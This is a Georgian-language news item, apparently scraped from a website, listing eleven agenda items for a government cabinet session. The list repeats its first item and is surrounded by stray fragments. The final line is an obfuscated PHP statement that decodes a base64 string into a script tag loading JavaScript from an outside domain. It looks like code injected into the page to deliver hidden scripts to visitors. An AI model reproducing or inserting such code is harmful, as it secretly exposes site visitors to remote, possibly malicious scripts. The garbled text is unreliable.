celsiusi
ავერსი საქკაბელი

დღეს, მთავრობის სხდომა გაიმართება. მთავრობის ადმინისტრაციის ცნობით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 11 საკითხს განიხილავს.

ეს საკითხებია:

  1. საქართველოს კანონების პროექტები „საგზაო მოძრაობის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“ და ,,საქართველოს ადმინისტრაციულ სამართალდარღვევათა კოდექსში ცვლილების შეტანის შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  2. საქართველოს კანონების პროექტები „საგზაო მოძრაობის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“ და ,,საქართველოს ადმინისტრაციულ სამართალდარღვევათა კოდექსში ცვლილების შეტანის შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  3. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „სომგოს კომპანიისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2014 წლის 4 აპრილის N616 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ნიკორასათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2021 წლის 14 დეკემბრის №2231 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  5. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „გლობალ ენტერპრაიზისისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2018 წლის 30 ოქტომბრის №2022 განკარგულებაში ცვლილების შეტანისა და შპს "გლობალ ენტერპრაიზისის“ საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  6. საქართველოს მთავრობის განკარგულების პროექტი ,,საქართველოს მთავრობასა და შპს "ჯგალჰეს“- ს შორის „ჯგალ ჰესი"-ს ჰიდროელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  7. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს მთავრობასა და შპს „დიემენ ვინდს“ შორის "ქუთაისის ქარის ელექტროსადგურის" შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  8. საქართველოს მთავრობის განკარგულების პროექტი "შპს „ამბასადორი ბათუმი აილენდ“-ის (ს/ნ 445601126) სასარგებლო წიაღისეულის მოპოვების ლიცენზიისაგან გათავისუფლების თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  9. საქართველოს მთავრობის განკარგულების პროექტი ,,საგადასახადო შეთანხმებების გაფორმების შესახებ“, მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;
  10. საქართველოს მთავრობის განკარგულების პროექტი ,,ევროპის რეკონსტრუქციისა და განვითარების ბანკის (EBRD) კაპიტალის გაზრდის რეზოლუციაზე საქართველოს თანხმობის შესახებ”, მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;
  11. საქართველოს მთავრობის განკარგულების პროექტი ,,თბილისის ზღვის მიმდებარე ტერიტორიაზე რეკრეაციული და საცხოვრებელი კომპლექსის მშენებლობის პროექტზე 2018 წლის 18 იანვარს გაფორმებულ პარტნიორთა შეთანხმებაში განსახორციელებელი ცვლილების თაობაზე”, მომხსენებელი: „საქართველოს განვითარების ფონდის“ დირექტორი ბესიკ ბუგიანიშვილი.
273
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");